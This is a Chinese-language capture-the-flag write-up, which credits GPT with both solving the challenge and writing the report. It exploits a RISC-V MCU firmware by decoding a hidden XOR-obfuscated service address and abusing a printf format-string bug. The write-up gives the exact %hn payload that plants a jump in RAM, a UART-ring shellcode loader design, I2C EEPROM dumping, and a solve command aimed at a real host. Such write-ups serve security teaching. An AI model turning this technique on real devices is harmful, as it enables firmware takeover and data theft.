题目由 GPT 完成，本报告也由 GPT 生成

1. 附件入手

题目给了两个附件：

firmware.bin：MCU 裸机固件。
schematic.pdf：硬件原理图。

这题不是 Linux ELF pwn，而是 MCU 固件利用。整体目标是先在固件里拿到代码执行，再根据原理图访问外接 EEPROM，把 EEPROM 中的 flag 打出来。

最终 flag：

1	ACTF{f423f891dc9d7a137f27e366fbff7974}

1.1 原理图信息

先看 schematic.pdf。用 pdftotext -layout schematic.pdf - 可以提取出主要器件：

1 2	U1: CH32V003F4P6 U2: AT24C64

原理图上还能看到 EEPROM 和 MCU 的连线：

1 2	AT24C64 SDA -> PC1 AT24C64 SCL -> PC2

因此后续拿到代码执行以后，读 flag 的方向基本确定：在固件里操作 GPIOC，用 PC1/PC2 bit-bang I2C，访问 AT24C64。

1.2 远端地址

题目没有额外给远端 IP 和端口，但固件里确实藏了连接方式。直接 strings 看不到：

1	strings -a firmware.bin \| rg "nc \|1\\.95\|10001\|host\|port"

只能看到普通交互 banner：

1	Type `exit' to exit.

原因是远端地址不是明文字符串，而是在启动阶段被异或解码输出。固件入口从 0x0 跳到 0xfca，进入主循环 0xde2 之前，会执行 0xdba 附近的一段隐藏输出逻辑：

d9c: 6485                 c.lui  x9,0x1
d9e: 4401                 c.li   x8,0
daa: fca48493             addi   x9,x9,-54        # x9 = 0xfca

dba: 6789                 c.lui  x15,0x2
dbc: e3878793             addi   x15,x15,-456     # x15 = 0x1e38
dc0: 00940733             add    x14,x8,x9        # x14 = 0xfca + i
dc4: 97a2                 c.add  x15,x8           # x15 = 0x1e38 + i
...
dca: 0409                 c.addi x8,2             # i += 2
dcc: 8d3d                 c.xor  x10,x15
dce: e26ff0ef             jal    x1,0x3f4         # putchar
dd2: 02a00793             addi   x15,x0,42
dd6: fef412e3             bne    x8,x15,0xdba

其中 0xdc6、0xdc8 这两个 16-bit 指令用通用 RISC-V 反汇编工具会显示成 F 扩展压缩指令，但结合寄存器流和实际输出，可以还原出等价逻辑：

1
2
3

for (int i = 0; i != 42; i += 2) {
    putchar(firmware[0x1e38 + i] ^ firmware[0x0fca + i]);
}

静态解码脚本：

from pathlib import Path

fw = Path("firmware.bin").read_bytes()
msg = bytes(fw[0x1e38 + i] ^ fw[0x0fca + i] for i in range(0, 42, 2))
print(msg.decode(), end="")

输出：

1	nc 1.95.116.62 10001

所以远端 UART bridge 地址为：

1	1.95.116.62:10001

远程服务启动时看到的完整输出类似：

Preparing environment... Timeout in 180 seconds
nc 1.95.116.62 10001
Type `exit' to exit.
<

其中 Preparing environment... 来自题目外层服务，后面的 nc ... 和 Type \exit’ to exit.都可以由固件 UART 输出。之前如果直接从主循环0xde2` 开始仿真，就会跳过这段启动阶段的隐藏输出。

2. 固件分析

firmware.bin 是裸机 raw binary：

1	firmware.bin: data

可以用 RISC-V raw binary 方式反汇编：

1	riscv64-linux-gnu-objdump -D -b binary -m riscv:rv32 -M no-aliases,numeric firmware.bin

入口在 0x0：

1 2	00000000: 0: 7cb0006f jal x0,0xfca

启动代码在 0xfca 附近设置 gp 和 sp：

00000fca:
 fca: 20000197   auipc x3,0x20000
 fce: 89618193   addi  x3,x3,-1898   # gp = 0x20000860
 fd2: fa018113   addi  x2,x3,-96      # sp = 0x20000800

后续初始化会把一部分代码和数据搬到 RAM，RAM 基址附近的 0x20000000 也会成为后面 exit path 的调用目标。

调试过程中定位到的关键地址如下：

含义	地址
`gp`	`0x20000860`
`sp`	`0x20000800`
主输入缓冲区 `input`	`0x200000e8`
UART RX DMA ring	`0x20000068`
UART RX ring 长度	`0x80`
RAM stub	`0x20000000`
单字节 RX helper	`0x242`
`putchar`	`0x3f4`
`read` wrapper	`0x518`
主循环	`0xde2`

这里有一个反汇编细节：题目是 RV32E flavor，固件里有不少压缩指令，普通 objdump 对个别 16-bit 指令的显示并不完全可信。遇到这种情况，需要结合寄存器数据流、仿真行为和远程输出一起判断。

3. 程序逻辑

主循环位于 0xde2 附近。整理成伪代码大致如下：

puts("Type `exit' to exit.");

while (1) {
    memset(input, 0, 0x40);       // input = 0x200000e8

    putchar('<');
    putchar(' ');

    read(0, input, 0x3f);

    if (strcmp(input, "exit\n") == 0) {
        puts("see ya");
        ((void (*)())0x20000000)();
    } else {
        printf(input);
    }
}

交互行为也和这个逻辑一致：

Type `exit' to exit.
< hello
hello
< exit
see ya

这里有两个重要点：

普通输入会直接作为 printf 的格式串。
输入精确等于 exit\n 时，会走 exit path，并调用 0x20000000。

exit path 的关键调用点如下：

1 2	ee2: 1ffff097 auipc x1,0x1ffff ee6: 11e080e7 jalr x1,286(x1) # call 0x20000000

这给了一个很好的劫持点：如果能修改 0x20000000 处的指令，就可以在输入 exit\n 时转到我们控制的代码。

4. 漏洞点

漏洞点是典型格式串：

1	printf(input);

固件自己的 printf 支持 %c、%x、%s、%n、%hn 等格式。虽然调用点没有传额外参数，但 printf 仍会继续从当前调用现场取 vararg。通过调试可以利用第 7 个参数做一次 16-bit 写。

最终使用的格式串是：

1	%41056c%c%c%c%c%c%hn

构造思路：

%41056c 消耗第 1 个参数，并把已输出字符数推进到 41056。
后面 5 个 %c 消耗第 2 到第 6 个参数，并让输出字符数再加 5。
%hn 消耗第 7 个参数，把当前输出字符数作为 16-bit 写入该参数指向的地址。

当前输出字符数为：

1	41056 + 5 = 41061 = 0xa065

同时把第一行输入的第 63 个字节设置为 0x20。在这个固件的调用现场布局下，这会让第 7 个 vararg 被解析为：

1	0x20000000

于是格式串完成的写入就是：

1	(uint16_t )0x20000000 = 0xa065;

0xa065 是一条 RISC-V compressed jump：

1	c.j 0x200000a8

也就是在 0x20000000 放一个 2 字节跳板，等 exit path 调用 0x20000000 时跳到 0x200000a8。

5. 利用思路

5.1 为什么不直接把 shellcode 放进 input

最直接的想法是：

第一轮输入用格式串改 0x20000000。
第二轮输入把 stage1 放进 input = 0x200000e8。
第三轮输入 exit\n 触发跳转。

这个方案会失败，因为每轮读输入前都会执行：

1	memset(0x200000e8, 0, 0x40);

也就是说，上一轮留在 input buffer 里的 stage1 会在下一轮处理 exit\n 前被清空。

5.2 把 stage1 放进 UART RX ring

固件的 UART 输入来自 DMA ring：

1 2	base = 0x20000068 size = 0x80

主循环会从 RX ring 取数据拷贝到 input buffer，但不会清空 RX ring 本身。因此可以把 stage1 留在 RX ring 里，再让 0x20000000 的跳板跳过去。

利用发送三段控制数据：

段	长度	作用
`line_a`	63	格式串，写 `0xa065` 到 `0x20000000`
`line_b`	63	预加载 stage1 到 UART RX ring
`exit_line`	5	发送 `exit\n`，触发 exit path

RX ring 长度为 128。前两行一共 126 字节，再发送 exit\n 会发生 ring wrap，但只覆盖 ring index 0..2，不会破坏第二行中的 stage1。

第二行从 ring index 63 开始。为了让 stage1 2 字节对齐，在 stage1 前放 1 字节填充：

1 2	stage1_addr = 0x20000068 + 63 + 1 = 0x200000a8

这正好对应前面写入的 c.j 0x200000a8。

5.3 必须分段发送

不能把所有 payload 一次性 sendall。

第一段格式串会打印大约 41 KB 空格。如果后续 stage1、exit\n、stage2 一次性塞给远端，远端 UART/桥接层在大量输出期间可能丢输入，导致 stage1 或 stage2 不稳定。

最终交互流程必须按阶段等待 prompt：

send(line_a)
wait("< ")

send(line_b)
wait("< ")

send(exit_line)
wait("see ya")

send(stage2_block)

5.4 stage1 loader

stage1 本身放在 RX ring 中，但上传 stage2 时新的 UART 数据会覆盖 RX ring。因此 stage1 不能一直在 ring 中运行。

另一个问题是，直接调用固件的 read(0, 0x20000128, 0x400) 不稳定。远程调试时出现过 read() 短返回，只读到 stage2 开头几个字节就跳进去，最终 HardFault。

最终 stage1 设计为两步：

RX ring 中的 stage1 先把一个 16 字节的小 loader 复制到安全 RAM，也就是 0x200000e8。
跳到 0x200000e8 后，小 loader 调用固件底层单字节 RX helper 0x242，逐字节读取 0x400 字节 stage2 到 0x20000128。

stage1 逻辑可以整理为：

stage1:
    s0 = 0x20000128       ; stage2 dst
    t1 = s0               ; stage2 entry
    s1 = 0x400            ; remaining bytes
    t0 = 0x242            ; firmware getc helper

    copy loader from RX ring to 0x200000e8
    jump 0x200000e8

loader:
    a0 = s0
    call t0               ; receive one byte into *a0
    if no byte: retry
    s0++
    s1--
    if s1 != 0: loop
    jump t1

这样可以同时解决两个问题：

stage2 上传会覆盖 RX ring，但 loader 已经搬到了 0x200000e8。
不依赖 read() 一次读满，而是用单字节 helper 稳定收满 stage2。

5.5 stage2 读取 EEPROM

stage2 根据原理图操作 GPIO：

1
2
3

SDA = PC1
SCL = PC2
I2C address = 0x50

它完成的事情是：

初始化 GPIOC。
用 PC1/PC2 bit-bang I2C。
读取 AT24C64。
调用固件 putchar() 输出 EEPROM 内容。

实际远程验证默认方向 SDA=PC1, SCL=PC2 正确，不需要交换引脚。

6. 最终 payload 布局

最终 payload 总长度为：

1	63 + 63 + 5 + 1024 = 1155 bytes

布局如下：

部分	长度	内容
`line_a`	63	`%41056c%c%c%c%c%c%hn`，末字节 `0x20`
`line_b`	63	`A + stage1 + padding`
`exit_line`	5	`exit\n`
`stage2_block`	1024	stage2，不足补零

完整控制流：

printf(input)
  -> *(uint16_t *)0x20000000 = 0xa065
  -> 发送 stage1 到 UART RX ring
  -> 发送 exit\n
  -> exit path call 0x20000000
  -> c.j 0x200000a8
  -> stage1 复制 loader 到 0x200000e8
  -> loader 逐字节读取 stage2 到 0x20000128
  -> jump 0x20000128
  -> stage2 bit-bang I2C 读取 AT24C64
  -> putchar 输出 flag

7. 利用结果

运行：

1	python3 solve_amcu_exittramp.py --host 1.95.116.62 --port 10001 --timeout 18

成功输出：

[+] flag candidate: ACTF{f423f891dc9d7a137f27e366fbff7974}

[+] flag-looking candidate(s):
     ACTF{f423f891dc9d7a137f27e366fbff7974}